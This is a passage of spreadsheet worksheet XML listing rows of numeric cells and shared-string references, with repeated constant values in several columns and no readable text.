    <row r="12656" ht="15.75" customHeight="1">
      <c r="A12656" s="1">
        <v>4356.0</v>
      </c>
      <c r="B12656" s="2">
        <v>4.2088721E7</v>
      </c>
      <c r="C12656" s="2" t="s">
        <v>12168</v>
      </c>
      <c r="D12656" s="2">
        <v>1.0</v>
      </c>
      <c r="E12656" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12656" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12657" ht="15.75" customHeight="1">
      <c r="A12657" s="1">
        <v>4658.0</v>
      </c>
      <c r="B12657" s="2">
        <v>4.3124618E7</v>
      </c>
      <c r="C12657" s="2" t="s">
        <v>12169</v>
      </c>
      <c r="D12657" s="2">
        <v>1.0</v>
      </c>
      <c r="E12657" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12657" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12658" ht="15.75" customHeight="1">
      <c r="A12658" s="1">
        <v>5126.0</v>
      </c>
      <c r="B12658" s="2">
        <v>4.4577224E7</v>
      </c>
      <c r="C12658" s="2" t="s">
        <v>12170</v>
      </c>
      <c r="D12658" s="2">
        <v>1.0</v>
      </c>
      <c r="E12658" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12658" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12659" ht="15.75" customHeight="1">
      <c r="A12659" s="1">
        <v>5287.0</v>
      </c>
      <c r="B12659" s="2">
        <v>4.5192024E7</v>
      </c>
      <c r="C12659" s="2" t="s">
        <v>12171</v>
      </c>
      <c r="D12659" s="2">
        <v>1.0</v>
      </c>
      <c r="E12659" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12659" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12660" ht="15.75" customHeight="1">
      <c r="A12660" s="1">
        <v>5305.0</v>
      </c>
      <c r="B12660" s="2">
        <v>4.526375E7</v>
      </c>
      <c r="C12660" s="2" t="s">
        <v>12172</v>
      </c>
      <c r="D12660" s="2">
        <v>1.0</v>
      </c>
      <c r="E12660" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12660" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12661" ht="15.75" customHeight="1">
      <c r="A12661" s="1">
        <v>5794.0</v>
      </c>
      <c r="B12661" s="2">
        <v>4.6784659E7</v>
      </c>
      <c r="C12661" s="2" t="s">
        <v>12173</v>
      </c>
      <c r="D12661" s="2">
        <v>1.0</v>
      </c>
      <c r="E12661" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12661" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12662" ht="15.75" customHeight="1">
      <c r="A12662" s="1">
        <v>5796.0</v>
      </c>
      <c r="B12662" s="2">
        <v>4.6784659E7</v>
      </c>
      <c r="C12662" s="2" t="s">
        <v>12174</v>
      </c>
      <c r="D12662" s="2">
        <v>1.0</v>
      </c>
      <c r="E12662" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12662" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12663" ht="15.75" customHeight="1">
      <c r="A12663" s="1">
        <v>6015.0</v>
      </c>
      <c r="B12663" s="2">
        <v>4.7477446E7</v>
      </c>
      <c r="C12663" s="2" t="s">
        <v>12175</v>
      </c>
      <c r="D12663" s="2">
        <v>1.0</v>
      </c>
      <c r="E12663" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12663" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12664" ht="15.75" customHeight="1">
      <c r="A12664" s="1">
        <v>6284.0</v>
      </c>
      <c r="B12664" s="2">
        <v>4.8160461E7</v>
      </c>
      <c r="C12664" s="2" t="s">
        <v>12176</v>
      </c>
      <c r="D12664" s="2">
        <v>1.0</v>
      </c>
      <c r="E12664" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12664" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12665" ht="15.75" customHeight="1">
      <c r="A12665" s="1">
        <v>6379.0</v>
      </c>
      <c r="B12665" s="2">
        <v>4.8414311E7</v>
      </c>
      <c r="C12665" s="2" t="s">
        <v>12177</v>
      </c>
      <c r="D12665" s="2">
        <v>1.0</v>
      </c>
      <c r="E12665" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12665" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12666" ht="15.75" customHeight="1">
      <c r="A12666" s="1">
        <v>6512.0</v>
      </c>
      <c r="B12666" s="2">
        <v>4.8775383E7</v>
      </c>
      <c r="C12666" s="2" t="s">
        <v>12178</v>
      </c>
      <c r="D12666" s="2">
        <v>1.0</v>
      </c>
      <c r="E12666" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12666" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12667" ht="15.75" customHeight="1">
      <c r="A12667" s="1">
        <v>6533.0</v>
      </c>
      <c r="B12667" s="2">
        <v>4.8829107E7</v>
      </c>
      <c r="C12667" s="2" t="s">
        <v>12179</v>
      </c>
      <c r="D12667" s="2">
        <v>1.0</v>
      </c>
      <c r="E12667" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12667" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12668" ht="15.75" customHeight="1">
      <c r="A12668" s="1">
        <v>6946.0</v>
      </c>
      <c r="B12668" s="2">
        <v>4.9938004E7</v>
      </c>
      <c r="C12668" s="2" t="s">
        <v>12180</v>
      </c>
      <c r="D12668" s="2">
        <v>1.0</v>
      </c>
      <c r="E12668" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12668" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12669" ht="15.75" customHeight="1">
      <c r="A12669" s="1">
        <v>7106.0</v>
      </c>
      <c r="B12669" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C12669" s="2" t="s">
        <v>12181</v>
      </c>
      <c r="D12669" s="2">
        <v>1.0</v>
      </c>
      <c r="E12669" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12669" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12670" ht="15.75" customHeight="1">
      <c r="A12670" s="1">
        <v>7635.0</v>
      </c>
      <c r="B12670" s="2">
        <v>5.1768883E7</v>
      </c>
      <c r="C12670" s="2" t="s">
        <v>12182</v>
      </c>
      <c r="D12670" s="2">
        <v>1.0</v>
      </c>
      <c r="E12670" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12670" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12671" ht="15.75" customHeight="1">
      <c r="A12671" s="1">
        <v>7650.0</v>
      </c>
      <c r="B12671" s="2">
        <v>5.1791126E7</v>
      </c>
      <c r="C12671" s="2" t="s">
        <v>12183</v>
      </c>
      <c r="D12671" s="2">
        <v>1.0</v>
      </c>
      <c r="E12671" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12671" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12672" ht="15.75" customHeight="1">
      <c r="A12672" s="1">
        <v>8184.0</v>
      </c>
      <c r="B12672" s="2">
        <v>5.324506E7</v>
      </c>
      <c r="C12672" s="2" t="s">
        <v>12184</v>
      </c>
      <c r="D12672" s="2">
        <v>1.0</v>
      </c>
      <c r="E12672" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12672" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12673" ht="15.75" customHeight="1">
      <c r="A12673" s="1">
        <v>9003.0</v>
      </c>
      <c r="B12673" s="2">
        <v>5.497385E7</v>
      </c>
      <c r="C12673" s="2" t="s">
        <v>12185</v>
      </c>
      <c r="D12673" s="2">
        <v>1.0</v>
      </c>
      <c r="E12673" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12673" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12674" ht="15.75" customHeight="1">
      <c r="A12674" s="1">
        <v>9186.0</v>
      </c>
      <c r="B12674" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C12674" s="2" t="s">
        <v>12186</v>
      </c>
      <c r="D12674" s="2">
        <v>1.0</v>
      </c>
      <c r="E12674" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12674" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12675" ht="15.75" customHeight="1">
      <c r="A12675" s="1">
        <v>9189.0</v>
      </c>
      <c r="B12675" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C12675" s="2" t="s">
        <v>12187</v>
      </c>
      <c r="D12675" s="2">
        <v>1.0</v>
      </c>
      <c r="E12675" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12675" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12676" ht="15.75" customHeight="1">
      <c r="A12676" s="1">
        <v>9317.0</v>
      </c>
      <c r="B12676" s="2">
        <v>5.5577087E7</v>
      </c>
      <c r="C12676" s="2" t="s">
        <v>12188</v>
      </c>
      <c r="D12676" s="2">
        <v>1.0</v>
      </c>
      <c r="E12676" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12676" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12677" ht="15.75" customHeight="1">
      <c r="A12677" s="1">
        <v>9425.0</v>
      </c>
      <c r="B12677" s="2">
        <v>5.5795084E7</v>
      </c>
      <c r="C12677" s="2" t="s">
        <v>12189</v>
      </c>
      <c r="D12677" s="2">
        <v>1.0</v>
      </c>
      <c r="E12677" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12677" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12678" ht="15.75" customHeight="1">
      <c r="A12678" s="1">
        <v>9463.0</v>
      </c>
      <c r="B12678" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C12678" s="2" t="s">
        <v>12190</v>
      </c>
      <c r="D12678" s="2">
        <v>1.0</v>
      </c>
      <c r="E12678" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12678" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12679" ht="15.75" customHeight="1">
      <c r="A12679" s="1">
        <v>9970.0</v>
      </c>
      <c r="B12679" s="2">
        <v>5.6942487E7</v>
      </c>
      <c r="C12679" s="2" t="s">
        <v>12191</v>
      </c>
      <c r="D12679" s="2">
        <v>1.0</v>
      </c>
      <c r="E12679" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12679" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12680" ht="15.75" customHeight="1">
      <c r="A12680" s="1">
        <v>10832.0</v>
      </c>
      <c r="B12680" s="2">
        <v>1.5992104E7</v>
      </c>
      <c r="C12680" s="2" t="s">
        <v>12192</v>
      </c>
      <c r="D12680" s="2">
        <v>1.0</v>
      </c>
      <c r="E12680" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12680" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12681" ht="15.75" customHeight="1">
      <c r="A12681" s="1">
        <v>10946.0</v>
      </c>
      <c r="B12681" s="2">
        <v>1.7072329E7</v>
      </c>
      <c r="C12681" s="2" t="s">
        <v>12193</v>
      </c>
      <c r="D12681" s="2">
        <v>1.0</v>
      </c>
      <c r="E12681" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12681" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12682" ht="15.75" customHeight="1">
      <c r="A12682" s="1">
        <v>11283.0</v>
      </c>
      <c r="B12682" s="2">
        <v>2.0794462E7</v>
      </c>
      <c r="C12682" s="2" t="s">
        <v>12194</v>
      </c>
      <c r="D12682" s="2">
        <v>1.0</v>
      </c>
      <c r="E12682" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12682" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12683" ht="15.75" customHeight="1">
      <c r="A12683" s="1">
        <v>11425.0</v>
      </c>
      <c r="B12683" s="2">
        <v>2.1739149E7</v>
      </c>
      <c r="C12683" s="2" t="s">
        <v>12195</v>
      </c>
      <c r="D12683" s="2">
        <v>1.0</v>
      </c>
      <c r="E12683" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12683" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12684" ht="15.75" customHeight="1">
      <c r="A12684" s="1">
        <v>11580.0</v>
      </c>
      <c r="B12684" s="2">
        <v>2.2833512E7</v>
      </c>
      <c r="C12684" s="2" t="s">
        <v>12196</v>
      </c>
      <c r="D12684" s="2">
        <v>1.0</v>
      </c>
      <c r="E12684" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12684" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12685" ht="15.75" customHeight="1">
      <c r="A12685" s="1">
        <v>11861.0</v>
      </c>
      <c r="B12685" s="2">
        <v>2.4851813E7</v>
      </c>
      <c r="C12685" s="2" t="s">
        <v>12197</v>
      </c>
      <c r="D12685" s="2">
        <v>1.0</v>
      </c>
      <c r="E12685" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12685" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12686" ht="15.75" customHeight="1">
      <c r="A12686" s="1">
        <v>11879.0</v>
      </c>
      <c r="B12686" s="2">
        <v>2.5028566E7</v>
      </c>
      <c r="C12686" s="2" t="s">
        <v>12198</v>
      </c>
      <c r="D12686" s="2">
        <v>1.0</v>
      </c>
      <c r="E12686" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12686" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12687" ht="15.75" customHeight="1">
      <c r="A12687" s="1">
        <v>12045.0</v>
      </c>
      <c r="B12687" s="2">
        <v>2.6337126E7</v>
      </c>
      <c r="C12687" s="2" t="s">
        <v>12199</v>
      </c>
      <c r="D12687" s="2">
        <v>1.0</v>
      </c>
      <c r="E12687" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12687" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12688" ht="15.75" customHeight="1">
      <c r="A12688" s="1">
        <v>12492.0</v>
      </c>
      <c r="B12688" s="2">
        <v>2.9545693E7</v>
      </c>
      <c r="C12688" s="2" t="s">
        <v>12200</v>
      </c>
      <c r="D12688" s="2">
        <v>1.0</v>
      </c>
      <c r="E12688" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12688" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12689" ht="15.75" customHeight="1">
      <c r="A12689" s="1">
        <v>12496.0</v>
      </c>
      <c r="B12689" s="2">
        <v>2.9583237E7</v>
      </c>
      <c r="C12689" s="2" t="s">
        <v>12201</v>
      </c>
      <c r="D12689" s="2">
        <v>1.0</v>
      </c>
      <c r="E12689" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12689" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12690" ht="15.75" customHeight="1">
      <c r="A12690" s="1">
        <v>12810.0</v>
      </c>
      <c r="B12690" s="2">
        <v>3.1572498E7</v>
      </c>
      <c r="C12690" s="2" t="s">
        <v>12202</v>
      </c>
      <c r="D12690" s="2">
        <v>1.0</v>
      </c>
      <c r="E12690" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12690" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12691" ht="15.75" customHeight="1">
      <c r="A12691" s="1">
        <v>12874.0</v>
      </c>
      <c r="B12691" s="2">
        <v>3.1939068E7</v>
      </c>
      <c r="C12691" s="2" t="s">
        <v>12203</v>
      </c>
      <c r="D12691" s="2">
        <v>1.0</v>
      </c>
      <c r="E12691" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12691" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12692" ht="15.75" customHeight="1">
      <c r="A12692" s="1">
        <v>13202.0</v>
      </c>
      <c r="B12692" s="2">
        <v>3.4131437E7</v>
      </c>
      <c r="C12692" s="2" t="s">
        <v>12204</v>
      </c>
      <c r="D12692" s="2">
        <v>1.0</v>
      </c>
      <c r="E12692" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12692" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12693" ht="15.75" customHeight="1">
      <c r="A12693" s="1">
        <v>13501.0</v>
      </c>
      <c r="B12693" s="2">
        <v>3.541985E7</v>
      </c>
      <c r="C12693" s="2" t="s">
        <v>12205</v>
      </c>
      <c r="D12693" s="2">
        <v>1.0</v>
      </c>
      <c r="E12693" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12693" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12694" ht="15.75" customHeight="1">
      <c r="A12694" s="1">
        <v>13528.0</v>
      </c>
      <c r="B12694" s="2">
        <v>3.553111E7</v>
      </c>
      <c r="C12694" s="2" t="s">
        <v>12206</v>
      </c>
      <c r="D12694" s="2">
        <v>1.0</v>
      </c>
      <c r="E12694" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12694" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12695" ht="15.75" customHeight="1">
      <c r="A12695" s="1">
        <v>13771.0</v>
      </c>
      <c r="B12695" s="2">
        <v>3.6528626E7</v>
      </c>
      <c r="C12695" s="2" t="s">
        <v>12207</v>
      </c>
      <c r="D12695" s="2">
        <v>1.0</v>
      </c>
      <c r="E12695" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12695" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12696" ht="15.75" customHeight="1">
      <c r="A12696" s="1">
        <v>13789.0</v>
      </c>
      <c r="B12696" s="2">
        <v>3.6579239E7</v>
      </c>
      <c r="C12696" s="2" t="s">
        <v>12208</v>
      </c>
      <c r="D12696" s="2">
        <v>1.0</v>
      </c>
      <c r="E12696" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12696" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12697" ht="15.75" customHeight="1">
      <c r="A12697" s="1">
        <v>14208.0</v>
      </c>
      <c r="B12697" s="2">
        <v>3.8251644E7</v>
      </c>
      <c r="C12697" s="2" t="s">
        <v>12209</v>
      </c>
      <c r="D12697" s="2">
        <v>1.0</v>
      </c>
      <c r="E12697" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12697" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12698" ht="15.75" customHeight="1">
      <c r="A12698" s="1">
        <v>14244.0</v>
      </c>
      <c r="B12698" s="2">
        <v>3.835228E7</v>
      </c>
      <c r="C12698" s="2" t="s">
        <v>12210</v>
      </c>
      <c r="D12698" s="2">
        <v>1.0</v>
      </c>
      <c r="E12698" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12698" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12699" ht="15.75" customHeight="1">
      <c r="A12699" s="1">
        <v>14285.0</v>
      </c>
      <c r="B12699" s="2">
        <v>3.8480307E7</v>
      </c>
      <c r="C12699" s="2" t="s">
        <v>12211</v>
      </c>
      <c r="D12699" s="2">
        <v>1.0</v>
      </c>
      <c r="E12699" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12699" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12700" ht="15.75" customHeight="1">
      <c r="A12700" s="1">
        <v>14287.0</v>
      </c>
      <c r="B12700" s="2">
        <v>3.8496087E7</v>
      </c>
      <c r="C12700" s="2" t="s">
        <v>12212</v>
      </c>
      <c r="D12700" s="2">
        <v>1.0</v>
      </c>
      <c r="E12700" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12700" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12701" ht="15.75" customHeight="1">
      <c r="A12701" s="1">
        <v>14575.0</v>
      </c>
      <c r="B12701" s="2">
        <v>4.0078395E7</v>
      </c>
      <c r="C12701" s="2" t="s">
        <v>12213</v>
      </c>
      <c r="D12701" s="2">
        <v>1.0</v>
      </c>
      <c r="E12701" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12701" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12702" ht="15.75" customHeight="1">
      <c r="A12702" s="1">
        <v>14627.0</v>
      </c>
      <c r="B12702" s="2">
        <v>4.0305905E7</v>
      </c>
      <c r="C12702" s="2" t="s">
        <v>12214</v>
      </c>
      <c r="D12702" s="2">
        <v>1.0</v>
      </c>
      <c r="E12702" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12702" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12703" ht="15.75" customHeight="1">
      <c r="A12703" s="1">
        <v>14973.0</v>
      </c>
      <c r="B12703" s="2">
        <v>4.1373586E7</v>
      </c>
      <c r="C12703" s="2" t="s">
        <v>12215</v>
      </c>
      <c r="D12703" s="2">
        <v>1.0</v>
      </c>
      <c r="E12703" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12703" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12704" ht="15.75" customHeight="1">
      <c r="A12704" s="1">
        <v>15125.0</v>
      </c>
      <c r="B12704" s="2">
        <v>4.1887267E7</v>
      </c>
      <c r="C12704" s="2" t="s">
        <v>12216</v>
      </c>
      <c r="D12704" s="2">
        <v>1.0</v>
      </c>
      <c r="E12704" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12704" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12705" ht="15.75" customHeight="1">
      <c r="A12705" s="1">
        <v>15467.0</v>
      </c>
      <c r="B12705" s="2">
        <v>4.3120835E7</v>
      </c>
      <c r="C12705" s="2" t="s">
        <v>12217</v>
      </c>
      <c r="D12705" s="2">
        <v>1.0</v>
      </c>
      <c r="E12705" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12705" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12706" ht="15.75" customHeight="1">
      <c r="A12706" s="1">
        <v>15580.0</v>
      </c>
      <c r="B12706" s="2">
        <v>4.3440893E7</v>
      </c>
      <c r="C12706" s="2" t="s">
        <v>12218</v>
      </c>
      <c r="D12706" s="2">
        <v>1.0</v>
      </c>
      <c r="E12706" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12706" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12707" ht="15.75" customHeight="1">
      <c r="A12707" s="1">
        <v>15687.0</v>
      </c>
      <c r="B12707" s="2">
        <v>4.386116E7</v>
      </c>
      <c r="C12707" s="2" t="s">
        <v>12219</v>
      </c>
      <c r="D12707" s="2">
        <v>1.0</v>
      </c>
      <c r="E12707" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12707" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12708" ht="15.75" customHeight="1">
      <c r="A12708" s="1">
        <v>15893.0</v>
      </c>
      <c r="B12708" s="2">
        <v>4.4566326E7</v>
      </c>
      <c r="C12708" s="2" t="s">
        <v>12220</v>
      </c>
      <c r="D12708" s="2">
        <v>1.0</v>
      </c>
      <c r="E12708" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12708" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12709" ht="15.75" customHeight="1">
      <c r="A12709" s="1">
        <v>16014.0</v>
      </c>
      <c r="B12709" s="2">
        <v>4.5017423E7</v>
      </c>
      <c r="C12709" s="2" t="s">
        <v>12221</v>
      </c>
      <c r="D12709" s="2">
        <v>1.0</v>
      </c>
      <c r="E12709" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12709" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12710" ht="15.75" customHeight="1">
      <c r="A12710" s="1">
        <v>16536.0</v>
      </c>
      <c r="B12710" s="2">
        <v>4.6765973E7</v>
      </c>
      <c r="C12710" s="2" t="s">
        <v>12222</v>
      </c>
      <c r="D12710" s="2">
        <v>1.0</v>
      </c>
      <c r="E12710" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12710" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12711" ht="15.75" customHeight="1">
      <c r="A12711" s="1">
        <v>16720.0</v>
      </c>
      <c r="B12711" s="2">
        <v>4.7465326E7</v>
      </c>
      <c r="C12711" s="2" t="s">
        <v>12223</v>
      </c>
      <c r="D12711" s="2">
        <v>1.0</v>
      </c>
      <c r="E12711" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12711" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12712" ht="15.75" customHeight="1">
      <c r="A12712" s="1">
        <v>16729.0</v>
      </c>
      <c r="B12712" s="2">
        <v>4.7498116E7</v>
      </c>
      <c r="C12712" s="2" t="s">
        <v>12224</v>
      </c>
      <c r="D12712" s="2">
        <v>1.0</v>
      </c>
      <c r="E12712" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12712" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12713" ht="15.75" customHeight="1">
      <c r="A12713" s="1">
        <v>16988.0</v>
      </c>
      <c r="B12713" s="2">
        <v>4.8348415E7</v>
      </c>
      <c r="C12713" s="2" t="s">
        <v>12225</v>
      </c>
      <c r="D12713" s="2">
        <v>1.0</v>
      </c>
      <c r="E12713" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12713" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12714" ht="15.75" customHeight="1">
      <c r="A12714" s="1">
        <v>17080.0</v>
      </c>
      <c r="B12714" s="2">
        <v>4.8613207E7</v>
      </c>
      <c r="C12714" s="2" t="s">
        <v>12226</v>
      </c>
      <c r="D12714" s="2">
        <v>1.0</v>
      </c>
      <c r="E12714" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12714" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12715" ht="15.75" customHeight="1">
      <c r="A12715" s="1">
        <v>17242.0</v>
      </c>
      <c r="B12715" s="2">
        <v>4.9078767E7</v>
      </c>
      <c r="C12715" s="2" t="s">
        <v>12227</v>
      </c>
      <c r="D12715" s="2">
        <v>1.0</v>
      </c>
      <c r="E12715" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12715" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12716" ht="15.75" customHeight="1">
      <c r="A12716" s="1">
        <v>17343.0</v>
      </c>
      <c r="B12716" s="2">
        <v>4.9402967E7</v>
      </c>
      <c r="C12716" s="2" t="s">
        <v>12228</v>
      </c>
      <c r="D12716" s="2">
        <v>1.0</v>
      </c>
      <c r="E12716" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12716" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12717" ht="15.75" customHeight="1">
      <c r="A12717" s="1">
        <v>17344.0</v>
      </c>
      <c r="B12717" s="2">
        <v>4.9402967E7</v>
      </c>
      <c r="C12717" s="2" t="s">
        <v>12229</v>
      </c>
      <c r="D12717" s="2">
        <v>1.0</v>
      </c>
      <c r="E12717" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12717" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12718" ht="15.75" customHeight="1">
      <c r="A12718" s="1">
        <v>17346.0</v>
      </c>
      <c r="B12718" s="2">
        <v>4.9402967E7</v>
      </c>
      <c r="C12718" s="2" t="s">
        <v>12230</v>
      </c>
      <c r="D12718" s="2">
        <v>1.0</v>
      </c>
      <c r="E12718" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12718" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12719" ht="15.75" customHeight="1">
      <c r="A12719" s="1">
        <v>17577.0</v>
      </c>
      <c r="B12719" s="2">
        <v>5.0266539E7</v>
      </c>
      <c r="C12719" s="2" t="s">
        <v>12231</v>
      </c>
      <c r="D12719" s="2">
        <v>1.0</v>
      </c>
      <c r="E12719" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12719" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12720" ht="15.75" customHeight="1">
      <c r="A12720" s="1">
        <v>17974.0</v>
      </c>
      <c r="B12720" s="2">
        <v>5.1359725E7</v>
      </c>
      <c r="C12720" s="5" t="s">
        <v>12232</v>
      </c>
      <c r="D12720" s="2">
        <v>1.0</v>
      </c>
      <c r="E12720" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12720" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12721" ht="15.75" customHeight="1">
      <c r="A12721" s="1">
        <v>18164.0</v>
      </c>
      <c r="B12721" s="2">
        <v>5.1918087E7</v>
      </c>
      <c r="C12721" s="2" t="s">
        <v>12233</v>
      </c>
      <c r="D12721" s="2">
        <v>1.0</v>
      </c>
      <c r="E12721" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12721" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12722" ht="15.75" customHeight="1">
      <c r="A12722" s="1">
        <v>18281.0</v>
      </c>
      <c r="B12722" s="2">
        <v>5.2250092E7</v>
      </c>
      <c r="C12722" s="2" t="s">
        <v>12234</v>
      </c>
      <c r="D12722" s="2">
        <v>1.0</v>
      </c>
      <c r="E12722" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12722" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
